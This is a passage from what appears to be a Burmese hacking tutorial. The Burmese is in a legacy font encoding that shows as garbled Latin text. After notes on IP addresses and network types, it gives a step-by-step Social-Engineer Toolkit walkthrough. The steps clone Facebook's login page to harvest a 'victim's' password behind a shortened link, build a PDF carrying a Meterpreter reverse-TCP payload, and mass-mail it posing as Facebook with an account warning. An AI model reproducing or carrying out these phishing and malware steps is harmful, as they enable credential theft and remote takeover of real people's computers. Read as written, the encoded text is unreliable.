Address u (txufygyHkt&) 82.10.250.19 jzpfjyD; yHkyg network twGif;&Sd
rnfonfh device wGifrqdk Public IP Address onf xdk wpfckom jzpfygw,f/
prf;oyfMunfhvdkygu Network twGif;&Sd device wdkif;&JU browser rSm
whatismyipaddress.com udk &dkufxnfhoGm;a&mufMunfhEdkifygonf/

Why do people want to know our IP address and who know our IPs?
ar;cGef;&JU yxrdkif;udk t&ifajzygw,f/ uRefawmfwdkY&JU public IP address
udk odvdkMuwJh taMumif;t&mawGxJu trsm;pkuawmh uRefawmfwdkY&JU location
udk odcsifwmaMumifhygyJ/ OyrmtaeeJYajym&&if ypönf;a&mufrS aiGay;acs&wJh
online shop BuD;awGrSmqdk&if (r&dk;ajzmifhwJholawGu wrif npfavh&SdwmaMumifh)
location odzdkYu ta&;ygvmygw,f/ ydkjyD; em;vnfatmif ajym&&if MDY uyg
qdkjyD; rSm,laewJh customer wpfa,mufu IP location rSm MDY r[kwfbJ YGN
jzpfaew,fqdkygpdkY/ 'gqdk 'g[m vdrfnmjcif;wpfrsdK;om jzpfwmrdkY 'D customer onf
&dk;ajzmifhrIr&Sdbl;qdkwm odEdkifygw,f/ aemufwpfcku vdyfpmyg/
a&SUrSm erlem jycJhjyD;jyDaemf/ IP lookup rSm Location udk teD;uyfqHk;
jrifawGYEdkifw,fqdkwm/ (jrefrmEdkifiHrSmawmh jrdKUBuD;awGavmufyJ vrf;awG
rSefuefygao;w,f/ jrdKUi,fawGrSmawmh vrf;emrnfawG rrSefao;ovdk
rygao;wJhvrf;awGvnf; jrdKUBuD;awGrSmawmif &Sdwwfygw,f/)
ar;cGef;&JU 'kwd,ydkif;u b,folawGu uRefawmfwdkY&JU IP address udk
odaeEdkifvJqdkwm jzpfygw,f/ IP address rSm tydkif; ESpfydkif; yg0ifwmrdkYvdkY
wpfydkif;pD azmfjyygr,f/ Private IP (local IP address) udkawmh same network udk
toHk;jyKaewJh user awGxJu (IP address)awG taMumif; od&SdolawGom odEdkifyg
w,f/ tjcm;olawGu oifh&JU Private IP address udk odzdkY rvG,fulyg/ 'gaMumifh
Same Network Access udk &,lEdkifzdkY BudK;pm;Muwm jzpfygw,f/ tu,fírsm;
oifh&JU target u Public Wifi awGudk oHk;avh&Sdolqdk&ifawmh oifhtwGuf same
network access &&SdzdkYu cufcJrSm r[kwfawmhygbl;/
Public IP address udkawmh od&SdaeEdkifolawG rsm;pGm &SdMuygw,f/ Oyrm
oifhtaeeJY pmwkdufuae pmwpfapmif xnfhr,fqdkygawmh/ oifhqD
jyefpma&mufEdkifzdkYtwGuf oifhvdyfpmudk jyefxnfhay;&rSmjzpfygw,f/
'Doabmtwdkif;ygyJ/ website wpfckuae taMumif;t&mwpfckudk oif
zGifhMunfhwJhtcg tqdkyg website xH oifMunfhvdkwJhtaMumif;t&mudk request
jyKvkyfygw,f/ xdk site uae oifh&JU public IP twdkif; jyefvnfay;ydkYvmwJh
tcsuftvufudk oif jyefvnf vufcH&&SdrSmjzpfygw,f/ 'gaMumifh oif toHk;jyKwJh
website wdkif;onf oifh&JU IP address udk odaeEdkifygw,f/
aemuf oifh&JU public IP udk tjrJwrf; odaeEdkifrSmu oiftoHk;jyKaewJh
ISP yg/ Oyrm oifu zkef;u'feJYom toHk;jyKolqdk&if oifh&JU ISP u (MPT,
Telenor, Ooredoo, MEC,...) pwmawGaygh/ olwdkYyJodrSmvm;qdk&ifawmh
r[kwfao;ygbl;/ Oyrm - oifu tjcm;ol&JU gmail (or) Facebook account
wpfckckudk forget password uaewpfqifh recovery vkyfzdkY BudK;pm;wJhtcgrSm
vnf;yJ oifh&JU IP address u tqdkyg Account ydkif&SifxH report taeeJY
a&muf&SdoGm;rSmjzpfygw,f/
'gawGtjyif oifhuGefysLwmudk iSm;oHk;wJhtcgrSmjzpfap? uRefawmfwdkY&JU
network udk tjcm;wpfpHkwpfa,mufudk toHk;jyKcGifh ay;wJhtcgrSmjzpfap? oHk;aeus
Facebook wdkYvdk social media awG&JU admin awGu jzpfap? IP tracking
vkyfEdkifzdkYtwGuf zefwD;xm;wJh Link awGudk ESdyfrdjcif;ujzpfap? pwJhtcsufawG
uaevnf; oifh&JU Public IP address udk od&SdapEdkifygw,f/
Static Vs Dynamic IP addresses
'Dcgawmh Static eJY Dynamic IP address awGtaMumif; tenf;i,f
aqG;aEG;ygr,f/ tm;vHk;odwJhtwdkif;ygyJ/ Static IP u udef;aojzpfygw,f/
ajymif;vJrI r&SdwmaMumifh Public IP address rSm Static IP address qdk&ifawmh
tawmfhudk raumif;wJht&mygyJ/ Dynamic IP address uawmh wpfBudrfeJYwpfBudrf
tvSnfhus ajymif;vJaewmaMumifh yxrwpfBudrf tifwmeufzGifhcsdefeJY
aemufwpfBudrf zGifhoHk;wJhtcsdefrSm IP class csif; wlwmuvGJ&if IP address onf
vHk;0 ajymif;vJoGm;rSmjzpfygw,f/ 'gaMumifh zkef;eJYoHk;olawGqdk&if zkef;udk restart
jyKvkyfvdkufvsifjzpfap? tifwmeufvdkif; ydwfxm;jyD;aemuf jyefzGifhwJhtcgrSmjzpfap
whatismyipaddress.com rSm oGm;Munfh&if ajymif;vJaewmudk
awGYjrif&rSmjzpfygw,f/ rsm;aomtm;jzifhawmh ISP awG[m Dynamic IP address
udk toHk;jyKavh&SdMuygw,f/
'gaMumifh oifhtaeeJY Public IP address udk tjref ajymif;vJvdkygu
zkef;udk reboot vkyfvdkuf&HkygyJ/ jyefyGifhvmwmeJY oifh&JU Public IP address u
ajymif;vJaewmudk awGY&ygr,f/ Static IP address udkawmh Local Address jzpfwJh
Private IP address awGrSm awGY&wwfygw,f/ olwdkYuawmh 'D Network
xJrSm&SdaeorSs 'Dpufu 'DeHygwftwdkif;ygyJ/ tjcm; network rSm ajymif;oHk;rSom
ajymif;rSmjzpfygw,f/

How to hide our IP addresses

uRefawmfwdkY&JU IP address udk azsmufay;Edkifr,fh enf;vrf; av;ck
&Sdygw,f/
 Use a VPN Service
 Use Tor
 Use a Proxy Server
 Use Free/Public WiFi
tao;pdwfudkawmh razmfjyawmhbl;aemf/ txufygenf;vrf; av;ckeJY
uRefawmfwdkY&JU Public IP address awGudk y,fazsmufxm;Edkifygw,f/
,ck IP address ESifh ywfoufjyD; azmfjyxm;orSsudk what is my ip
address .com rS aqmif;yg;rsm;tm; rSDjirf;xm;ygaMumif;cifAsm/

Network Types
toHk;jyKrI {&d,may: rlwnfjyD; network type oHk;rsdK;&Sdygw,f/
odjyD;olawGu ydkrsm;r,fxifygw,f/ 'gaMumifh rodao;ol tenf;i,ftwGuf
tusOf;csKyfuav; aqG;aEG;ay;oGm;ygr,f/
1.LAN (Local Area Network)
&Hk;? ausmif; eJY university awG? Super-market vdk ae&mawGrSm
uGefysLwmawG tcsif;csif; csdwfquftoHk;jyKwJh computer network trsdK;tpm;
wpfckjzpfygw,f/ Limited area twGif;om toHk;jyKEdkifygw,f/ Cable awG? wifi
awGudk toHk;jyKcsdwfqufEdkifjyD; tifwmeuf rvdktyfbJ tcsuftvufawGudk
rQa0Edkifygw,ff/ (internal Only) yg/

2.MAN (Metropolitan Area Network)

oluawmh LAN xufydkrdkBuD;rm;us,fjyefYygw,f/ Metropolitan qdkwm
jrdKUawmf vdkYqdkvdkwJhtwGuf jrdKUwpfjrdKUpm &SdwJh network vdkY tvG,fwul
rSwfom;Edkifygw,f/ urÇmt&yf&yfeJY csdwfqufzdkYavmufxdawmh rBuD;ao;wJh
network aygh/

3.WAN (Wide Area Network)

tu,fjyefYqHk; network jzpfjyD; olYxJrSm LAN eJY MAN network
aygif;rsm;pGm yg0ifaeygw,f/ ,aeY uRefawmfwdkY toHk;jyKaewJh tifwmeuf
(International Network) onf vnf;yJ WAN network om jzpfygw,f/

What do we Attack/hack
Hacking jyKvkyfwJhtcgrSm uRefawmfwdkYtaeeJY target xm;MuwmawGudk
jyefMunfhwJhtcg Phishing jyKvkyfjcif;rsdK;? access stealing jyKvkyfjcif;rsdK; pwmawGeJY
cdk;,lEdkifzdkY BudK;pm;avh&SdMuwJh Accounts (e.g. gmail, facebook, ...) qdkif&m? web
(sites & application) qdkif&m? System udk csdK;azmufjyD; information
0ifa&muf&,lwJh System qdkif&m ponfjzifh t"dutydkif;awGudk
cGJjcm;jrifawGY&rSmjzpfygw,f/ 'gaMumifh aemufydkif; Chapter awGrSm Exploit &
Attacks awGudk qufvufazmfjyay;oGm;rSmjzpfygw,f/ odrSwfxm;&rSmu
Exploitation acgif;pOfatmufrSmr[kwfayr,fh olwdkYawGvnf; exploitation
awGygyJ qdkwmyg/ tm;vHk; tqifajyMuvdrfhr,fvdkY arQmfvifhygw,fcifAs/
CHAPTER 12: Social Engineering & Toolkit

Introduction

Social Engineering Toolkit qdkwmuawmh emrnft&wif social

engineer awG oHk;wJh toolkit wpfrsdK;rSef; odomvG,fygw,f/ Social Engineering
onf a&S;usayr,fh ,aeYxd atmifjrifpGm toHk;jyKEdkifaeqJ enf;vrf;wpfck
jzpfygw,f/ ,aeYacwfvdk Social Media awG ydkrdkwGifus,fvmwJhtcsdefrSm Social
Engineering (SE) u ydkjyD; wGifus,fpGm oHk;Edkifvmwm tHhMop&mawmh r&Sdygbl;/
tvG,fajym&&if SE qdkwmu udk,fodcsifwmawG odEdkifzdkYtwGuf
enf;rsdK;pHkeJY vdrfnmvSnfhywfjyD;awmh Information awmif;wmrsdK;yg/
tJvdkvkyfwJhtcg tcsdKUae&mawGrSm pum;ajym&HkeJYwif odvdkwJhtcsufawGudk
&Edkifayr,fh tcsdKUe,fy,fawGrSmawmh pum;ajymqdk&HkeJYwif &&SdEdkifrSm r[kwfygbl;/
tJonftcg tjcm; taxmuftyHhawG vdktyfvmygw,f/ Social Engineering
qdkwm uGefysLwmeJY roufqdkifwJh e,fy,fawGrSmvnf;yJ &SdaewmygyJ/
ckpmtkyfrSmawmh oufqdkifwmawGyJ azmfjyoGm;ygr,f/
yxrqHk; uRefawmfwdkY avhvm&rSmu Social Engineering Toolkit yg/
Kali Linux rSm Build-in taeeJY yg0ifw,fqdkayr,fh error BuHKwJhtcg
ygrvmwmrsdK; &Sdwwfygw,f/ tJvdk ygrvmyguvnf; vG,fulpGm wifEdkifygw,f/
Terminal udk zGifhjyD; atmufygtwdkif; vkyfaqmif&if &ygjyD/
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set
python setup.py install

txufygtwdkif; tvG,fwul install EdkifrSmjzpfygw,f/ Install zdkY vdk

rvdkqdkwmudkawmh Terminal udk zGifhjyD; setoolkit vdkY&dkufMunfhEdkifygw,f/ bash:
setoolkit : command not found vdkY awGY&if install zdkY vdktyfjyD; set> (setoolkit
main menu) qD a&mufoGm;vsifjzpfap (Y/n for first use) yxrqHk;tBudrf
pwifoHk;olawGtwGuf Y/n (yes or no) ar;vsifjzpfap jyefifp&m rvdkygbl;/ Y/n
ar;vsif y &dkufxnfhjyD; enter vdkuf&HkeJY Main Menu qD a&mufoGm;rSmjzpfygw,f/
vufawGY vkyfMunfhvdkuf&atmifAs/
Main Menu of setoolkit

setoolkit &JU main menu rSmawmh txufygtwdkif; awGYjrif&rSmjzpfjyD;

a&G;cs,fp&m 6 ckudk awGYjrif&ygr,f/ a&G;p&m menu 6ck qdkayr,fh 4) u Update
the Social-Engineer Toolkit qdkwmudk awGY&rSmjzpfygw,f/ Version
topfxGufvmwJhtcg upgrade jyKvkyfEdkifzdkYjzpfjyD; 5) uawmh SET configuration
udk update jyKvkyfEdkifzdkYjzpfum 6) u help option jzpfwmrdkY t"du avhvmp&monf
1, 2, 3 om &Sdygw,f/
wpfckcsif;pDrSmvnf; oD;jcm; sub-menu awG &Sdaeygao;w,f/ 'gaMumifh
setoolkit wpfckvHk;udk avhvmzdkYuawmh tcsdef tawmfay;&ygvdrfhr,f/ main
menu udk jyefMunfh&atmif/ uRefawmfwdkY avhvm&r,fh tydkif;oHk;ckrSm yxrqHk;
wpfcku Social-Engineering Attacks yg/ 2 u Penetration Testing (Fast-Track)
jzpfjyD; wwd,wpfcku Third Party Modules qdkwmudk awGYjrif&ygr,f/
wpfckcsif;pDudk azmfjyaqG;aEG;ay;oGm;ygr,f/ yxrqHk; Menu 1)
Social-Engineering Attacks udk vkyfaqmifEdkifzdkYtwGuf Terminal rSm setoolkit vdkY
&dkufxnfhjyD; zGifhvdkufyg/ zGifhxm;jyD;om;qdkxyfzGifhp&mrvdkyg/
yxrqHk;taeeJY 1 udk a&G;cs,fjyD; qufoGm;Munfhyg/ menu t& 1 onf
Social-Engineering Attacks jzpfygw,f/ tay: yHkrSm MunfhEdkifygw,f/
(ay:vmwJh set> &JUaemufrSm 1 vdkY &dkufjyD; enter vdkuf&HkygyJ/)
 main menu uae 1 udk a&G;vdkufwJhtcg txufygtwdkif; 'kwd, menu
udk a&mufoGm;ygr,f/ 1 uae 11 xd a&G;p&m awGU&rSmjzpfjyD; 'Dae&mrSmawmh
erlemtaeeJY Attack wpfck jyD;atmif azmfjycsifvdkY 2) Website Attack Vectors udk
a&G;ygr,f/ option 2 rdkY 2 vdkY &dkufxnhfjyD; enter yg/

ckqdk&ifawmh terminal rSm set:webattack vdkY jrif&rSmyg/ Menu rSm

Munfh&ifvnf; website attack vector xJrSm yg0ifwJh method awGudk awGYjrif&rSm
jzpfygw,f/ 'DerlemrSmawmh uRefawmfu 3) Credential Harvester Attack Method
udk toHk;jyKjyoGm;ygr,f/ 3 &dkufxnfhjyD; enter vdkufyg/
a&G;p&mawGudk atmufygtwdkif; jrif&ygr,f/
 1) Web Templates, 2) Site Cloner eJY 3) Custom Import rSm
erlemtaeeJY 2) Site Cloner udk a&G;jyygr,f/

ay:vmwmu IP address jznfhcdkif;wmyg/ uRefawmfwdkY&JU IP address udk

jznfhoGif;&ygr,f/ txufygyHktwdkif; rdrdwdkY&JU IP address udk jznfhjyD; enter vdkufyg/
IP address rodygu terminal aemuwpfck xyfzGifhjyD; ifconfig vdkY &dkuf&SmMunfhyg/
IP address udk jznfhoGif;jyD;ygu enter vdkufyg/

'Dcg uRefawmfwdkY clone vkyfr,fh website udk xnfhoGif;&rSmjzpfygw,f/

'Dae&mrSm OyrmtaeeJY Facebook udk erlemjyygr,f/

txufygtwdkif; www.facebook.com udk xnfhoGif;jyD; enter vdkufygu

cloning progress vkyfaewmudk t0ga&mifpmvHk;eJY jyay;rSmjzpfygw,f/
teDa&mifpmwef;eJY tjyma&mifpmwef; ay:vmjyDqdk&ifawmh toifhjzpfygjyD/

zGifhwmu IP address eJY zGifh&rSmrdkY udk,fh&JU Victim u tvG,fwul

oHo, rjzpfapzdkYtwGuf IP address udk Link tjzpf ajymif;vJEdkifzdkYtwGuf goo.gl
udk Browser uae oGm;vdkufyg/
 txufygyHktwdkif; SHORTEN ae&mrSm http://your-IP_Address udk
&dkufxnfh& ygr,f/ (IP address u cke web attack rSm xnfhcJhwJhtwdkif;
xnfh&rSmyg/) jyD;&if shorten URL qdkwmudk ESdyfyg (odkYr[kwf) enter vdkuf&HkygyJ/
uRefawmfuawmh 192.168.10.150 eJY erlemjyxm;wmjzpfvdkY
http://192.168.10.150 vdkY &dkufxnfhjyD; SHORTEN vdkufygw,f/

&vmwJh Link udk copy ,ljyD; same network rSm twloHk;aewJh tjcm;
user (my victim) xH ydkYvdkufygw,f/ Viction u zGifhvdkufjyDqdk&ifawmh

Facebook Fake Login Page udk txufygtwdkif; jrifawGY&ygr,f/

'DcgrSmawmh victim u xdkae&mrSm user & passwords awGudk jznfhoGif;jyD;
0ifa&mufygu Facebook udk tppftrSef a&muf&SdoGm;wmaMumifh owdrxm;rdEdkif
yg/ xdk Login 0ifvdkufaom tcsuftvufrsm;udk Terminal rSm jrifawGYEdkif
ygvdrfhr,f/ (rdrdom;aumifu 0ifa&mufMunfhvdkpdwf&Sdatmif qGJaqmifEdkifzdkYawmh
vdkygw,f/ 'gawmh udk,fhbmom pOf;pm;aygh aem ;)
 email u test-only@gmail.com eJY Passwords u thisismytesting vdkY
awGY&rSmjzpfygw,f/ tqdkyg wdkufcdkufrIrsdK;udk a&SmifEdkifzdkYtwGuf URL awGudk
aocsm ppfaq;yg/ URL awGudk rppfaq;wwfygu yxrwpfBudrf jznfhoGif;pOfrSm
rdrdeJY roufqdkifbJ pdwful;wnfh&m jznfhvdkufjcif;tm;jzifh Phishing
vkyfxm;wJhtqifhudk ausmfvGefoGm;ygvdrfhr,f/
Oyrm user ae&mrSm abcdef vdkYjznfh passwords ae&mrSm ghijkl vdkY
jznfhjyD; 0ifvdkufyg/ Facebook &JU Login Page tppfxH a&muf&SdoGm;ygvdrfhr,f/
tjcm; Login rsm;vnf; xdkYtwljzpfygw,f/ Facebook rSmqdk&if aemufxyf
wpfenf; &Sdygao;w,f/ Browser &JU atmufajcu Language ajymif;wJhae&mrSm
English Language udk a&G;cs,fvdkufjcif;jzifhvnf; Phishing URL uae Real
URL udk ajymif;vJoGm;rSmjzpfygw,f/
,ck azmfjyyg Attack (IP address eJY zefwD;&wJh Attack) rsdK;awGudk Same
network atmufrSmyJ toHk;jyKEdkifrSm jzpfygw,f/ Over WAN taeeJY
toHk;jyKvdkygvsifawmh Port Forwarding udk qufvuf avhvm&rSmjzpfygw,f/
qufvuf aqG;aEG;&atmifcifAs/

1) Social-Engineering Attacks
tay:rSm erlemtaeeJY Attack wpfckudk wpfqifhpD azmfjyay;jyD;oGm;jyD
jzpfvdkY vdkufvHvkyfaqmifMunfhygu em;vnfvdrfhr,fvdkY ,lqygw,f/
tqifhav;awGudk em;vnfoGm;jyDqdk&ifawmh Menu wpfckcsif;pD avhvmzdkYtwGuf
rcufawmhygbl;/ ck yxrqHk; Menu udk avhvm&atmifyg/
 Social-Engineering Attacks xJudk 0ifa&mufvdkufyg/

yxrqHk; Option wpfckjzpfonfh 1) Spear-Phishing Attack Vectors

xJodkY 0ifa&muf&ef 1 udk &dkufxnfhjyD; enter yg/ (rdrd toHk;jyKvdkaom eHygwfudk
&dkufxnfh&Hkomjzpfygojzifh/ eHygwfpOf &dkufxnfh&efudk aemuf razmfjyawmhyg/)
'Dae&mrSm Spear-phishing taMumif; tenf;i,f aqG;aEG;yg&ap/
Spear phishing is an email or electronic communications scam
targeted towards a specific individual, organization or business. Although
often intended to steal data for malicious purposes, Cyber-criminals may also
intend to install malware on a targeted user’s computer.
txufyg azmfjycsufudkawmh Kaspersky &JU Resource Cneter uae
ul;,lvmcJhjcif; jzpfygw,f/ Spear-phishing qdkwm wpfudk,fa&
tusdK;pD;yGm;twGufjzpfap? tzGJYtpnf; (odkYr[kwf) vkyfief; wpfckck\
tusdK;pD;yGm;twGuftjzpfap &nf&G,fvkyfaqmifay;ydkYwJh email (or) electronic
communication (w&m;r0if tusdK;pD;yGm; &SmazGrI) trsdK;tpm;wpfck vdkY
qdkEdkifygw,f/ rrSefuefwJh &nf&G,fcsufeJY Data awG cdk;,lzdkY &nf&G,f&if;jzpfayr,fh
Cyber-criminal awGuawmh target &JU uGefysLwmay:rSm malware awG xnfhoGif;zdkY
yg BudK;pm;vmMuygw,f/
rsm;aomtm;jzifh Government u ausmaxmufaemufcHjyKay;xm;wJh
Hacker awGeJY tjcm; hacker BuD;awG[m 'D Attack &JU aemufuG,frSm
&SdaewwfMuygw,f/ Cyber-criminal awGuvnf; 'Dvdk vkyfaqmifavh&SdMujyD;awmh
&vmwJh a'wmawGxJu wefzdk;&SdwJh a'wmawGudk Government (or) other
company awGudk jyefvnfa&mif;cszdkY BudK;pm;avh&Sdygw,f/ Oyrm uRefawmfwdkY
ukrÜPDu rMumcif vkyfaqmifzdkY &nf&G,fxm;wJh vkyfief; (odkYr[kwf) pmcsKyf
wpfckckudk jydKifbuf ukrÜPDxH a&mif;cswmrsdK;aygh/
'D Attack awGudk tqifhjrifhjrifh rGrf;rHvdkufr,fqdk&if detect vkyfzdkY vHk;0
cufcJwmaMumifh olYudk umuG,fwm;qD;zkdY cufygw,f/ aqG;aEG;wmav; &yfjyD;
vkyfaqmifcsufav;awG MunfhMunfh&atmif/ setoolkit xJu spear-phishing
attack twGufawmh a&G;cs,fp&m method uav;awGudk atmufygtwdkif;
jrif&ygr,f/

yxrqHk;wpfcku Mass Email Attack jzpfygw,f/ Mass Email Attack

rSmawmh Options 22 ck &Sdwm awGY&ygr,f/
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
7) Adobe Flash Player "Button" Remote Code Execution
 8) Adobe CoolType SING Table "uniqueName" Overflow
9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
17) Adobe PDF Embedded EXE Social Engineering (NOJS) udk
toHk;jyKjyygr,f/ 17 udk a&G;cs,fvdkufyg/

txufygyHktwdkif; xyfrH awGYjrif&rSmjzpfygw,f/ 'Dae&mrSmawmh

uRefawmfu 1. Use your own PDF for attack udk toHk;jyKjyygr,f/

zdkifemrnfeJY vrf;aMumif;udk atmufygtwdkif; ar;ygr,f/

uRefawmfu Desktop ay:rSm test.pdf qdkwJhzdkifav; (pdf zdkifwpfckudk

emrnfajymif;xm;wm) udk xnfhoHk;rSmrdkY Desktop/test.pdf vdkY &dkufxnfhvdkufwm
jzpfygw,f/

'DtqifhrSmawmh uRefawmfu 2) Windows Meterpreter Reverse_TCP

udk a&G;vdkufygw,f/

rdrd&JU IP address udk xnfhoGif;&rSmjzpfygw,f/

aemufwpfqifhuawmh jyefydkYvmzdkYtwGuf port udk xnfhoGif;ay;&rSmyg/

default port = 443 jzpfjyD;
uRefawmfuawmh 2960 udk xnfhoGif;vdkufygw,f/

Port jznfhoGif;jyD;wJhtcg payload generation jyKvkyfaewmudk

cPapmifh&ygr,f/ jyD;&ifawmh txufygyHktwdkif; ar;vmrSmjzpfygw,f/ 1 u
vuf&Sdzdkifemrnftwdkif;xm;r,f/ 2 u zdkifemrnf jyefjyifr,f qdkjyD;jzpfygw,f/
uRefawmfu 2 udk a&G;jyxm;ygw,f/

zdkifemrnftopf awmif;wJhtcg for-victim.pdf vdkY ay;vdkufygw,f/

a&SUrSm uRefawmf a&G;cJhwJh 17) onf pdf twGufrdkYjzpfygw,f/ jyD;wJhtcgrSmawmh
uRefawmfwdkY zefwD;xm;wJh zdkiu
f av;udk Home Directory rSm
MunfhvdkY&jyDjzpfygw,f/

zefwD;xm;wJh zdkifu .set qdkwJh Hidden Folder xJrSm &SdaewmaMumifh

File udkzGifh menu uae Show Hidden Files rSm trSefjcpf xnfhvdkufrSom
ay:vmrSmjzpfygw,f/ tay:yHkudk MunfhEdkifygw,f/ .set folder av; ay:vm&if
txJudk zGifh0ifjyD; cke zefwD;xm;wJhzdkifudk &,lEdkifjyDjzpfygw,f/

cke erlwmrSm zefwD;jyxm;wJh for-victim.pdf qdkwJhzdkifav;udk

txufygyHktwdkif; .set folder xJrSm awGYjrifEdkifygw,f/
Social Engineering >> Mass Mailer Attack
'Dcgawmh Social Engineering xJu Mass Mailer Attack udk
prf;oyfMunfh&atmifyg/

txufygtwdkif; 5) Mass Mailer Attack udk a&G;cs,f0ifa&muf

vdkufygw,f/

uRefawmfu mail vdyfpm wpfckwnf;udk wdkufcdkufvdkwmrdkY 1 udk

a&G;vdkufygw,f/

uRefawmfwdkY target xm;wJh mail address udk jznfhoGif;&rSmjzpfygw,f/

uRefawmfu erlemjyxm;wmrdkY uRefawmfhqDawmh jyefrydkYeJYaemf :)

'DtqifhrSmusawmh uRefawmfu udk,fydkif mail server r&Sdao;wmaMumifh

1 udkyJ a&G;cs,fvdkufygw,f/
 aemufwpfqifhuawmh uRefawmfwdkY&JU gmail udk xnfhoGif;&rSmyg/ rdrdwdkY
zGifhxm;wJh gmail address udk rSefatmifxnfhyg/ tBuHjyKvdkwmu taumifhopf
zGifhjyD; oHk;zdkYygyJ/

aemufwpfqifhu uRefawmfwdkY ydkYvdkufwJh gmail onf target xH

a&mufoGm;wJhtcg ay:apvdkwJh emrnfyg/ uRefawmfuawmh pm&&SdwJhol pdwf0ifpm;
apzdkYtwGuf Facebook vdkY emrnfay;vdkufygw,f/ qdkvdkwmu Facebook u
ydkYwmaygh/

jyD;vdkY enter vdkufjyDqdk&ifawmh gmail passwords awmif;ygvdrfhr,f/ cke

xnfhxm;wJh Account &JU Password udk xnfhay;vdkufaygh/ Password &dkufaepOf
pmjrif&rSmr[kwfwmaMumifh rrSm;atmif aocsm&dkufzdkY vdktyfygw,f/ 'Dae&mrSm
rSm;oGm;&if tpu jyef p&rSmrdkYvdkYygyJ/

txufyg tqifhawGudk &Sif;rjyawmhyg/

'Dtqifhu ta&;ygygw,f/ pmydkYwJh taMumif;t&if;udk ar;wmrdkYyg/

uRefawmfuawmh uRefawmfh&JU Target udk pmzGifhzwfapvdkwmaMumifh enf;enf;
vefYjyD; zwfjzpfatmif wGef;tm;ay;wJhtaeeJY Warning for your account vdkY
acgif;pOf xnfhoGif;ay;vdkufygw,f/ (uRefawmfwdkYqDrSmawmh taMumif;t&maygh)/

'Dae&mrSmawmh plain udk oHk;rSmjzpfvvdkY p eJYyJ a&SUqufvdkufygw,f/

'Dtqifhuawmh uRefawmfwdkY ydkYr,fh mail &JU pmudk,fyg/

Next line of the body: qdkwmu ydkYwJhpmxJrSm ygrSmr[kwfygbl;/

aemufwpfaMumif;taeeJY a&;w,fqdkwm odzdkYyJ &nf&G,fwmyg/ tJonfrSm rdrd
tvdk&Sd&m azmfjya&;om;Edkifygw,f/ jyD;jyDqdk&ifawmh aemufwpfvdkif;rSm END vdkY
tBuD;pmvHk;awGeJYcsnf; a&;jyD; Enter yg/ xdk END onfvnf; ydkYr,fh mail xJrSm
yg0ifjcif; r&Sdyg/
jyD;&ifawmh uRefawmfwdkY&JU Mail udk Victim xH ay;ydkYjyD; jzpfygw,f/
rSwfcsuf?? / mail ydkY&wmrsdK;jzpfwmaMumifh 'DtqifhawG vkyfaqmifzdkYtwGuf
internet zGifhxm;zdkY vdkr,fqdkwmawmh xnfhrajymawmhygbl;aemf/

Conclusion
'Dtcef;rSmawmh odoifhwJh tajccHuswJh tcsufuav;awGudk
jcHKiHkrdatmif azmfjyaqG;aEG;cJhygw,f/ Setoolkit wpfckvHk;udk wpfckrusef
azmfjyaqG;aEG;zdkYqdk&ifawmh oD;oefY pmtkyfpmtkyfBuD;wpftkyfpm jzpfaer,fqdkwm
menu awGudk Munfh&ifyif odEdkifygw,f/
'gaMumifh setoolkit xJu tjcm;aom taMumif;t&mawGudkvnf;
rdrdwdkYbmom qufvuf prf;oHk;MunfhEdkifr,fvdkY ,lq&if; 'Dae&mrSm
&yfem;yg&apcifAsm/ Setoolkit \ usef&Sdonfh toHk;jyKyHkrsm;udk Facebook Group
wGif qufvuf azmfjyay;oGm;rSmjzpfvdkY 'DpmtkyfrSmygwJh Member Form udk
jznfhpGufjyD; ay;ydkYvdkuf&HkeJY Facebook Group Member tjzpf qufvuf
avhvmEdkifOD;rSjzpfygw,fcifAsm/
CHAPTER 13: Authentication System

Introduction

uGefysLwmpepfwpfckxJudk uRefawmfwdkY Login 0ifa&mufwJhtcg [kwf

r[kwf cGJjcm;EdkifzdkYtwGuf user name & password vdk information awG xnfhoGif;
ay;&ygw,f/ 'gudk Authentication vdkY ac:ygw,f/
Authentication rSm wu,fawmh user name & password tjyif
tjcm;t&mawGudkvnf; other security layer awGtaeeJY jznfhoGif;Edkifygao;w,f/
Oyrm - vuaAGpepfvdkrsdK;? tm;vHk;odMuwJh Login Approval (2 steps verification)
rsdK;awGaygh/ Authentication process wpfck vkyfaqmifzdkYtwGuf user name &
password pwmawGudk odkavSmif odrf;qnf;xm;r,fh Database pepfwpfck
vdktyfygw,f/ Data awGudkawmh rsm;aomtm;jzifh plain text taeeJYr[kwfbJ
hashed texts awGeJY odrf;qnf;avh&SdMuygw,f/
tJonf database udk workgroup environment wpfcktaeeJY Local
system xJrSm odkavSmifxm;Edkifovdk Active directory wpfckudk toHk;jyKwJhtcg
server wpfckckrSmvnf; odkavSmifxm;Edkifygw,f/ 'DtcsuftvufawGudk Local
system xJrSm xm;&SdtoHk;jyKjcif;u pdwfcs&rItydkif;rSm ydkrdktm;enf;apygvdrfhr,f/
bmaMumifhvJqdk&if database system udk dump vkyfzdkYeJY password awGudk offline
taeeJY crack oGm;EdkifzdkY vG,fuloGm;wJhtwGuf jzpfygw,f/
'ghjyif Microsoft system awGonf local computer database rSm
passwords awGudk odkavSmifodrf;&mrSm vHkjcHKrItm;enf;wJh hash algorithms udkom
toHk;jyKxm;wmaMumifh jzpfygw,f/ tJonf database udk SAM database vdkY
ac:ygw,f/
Authentication jyKvkyf&mrSm toHk;jyKwJh basic form uawmh user name
& password udk toHk;jyKjcif;ygyJ/ PIN awG Pattern awGeJY wpfqifhcHxm;wJh
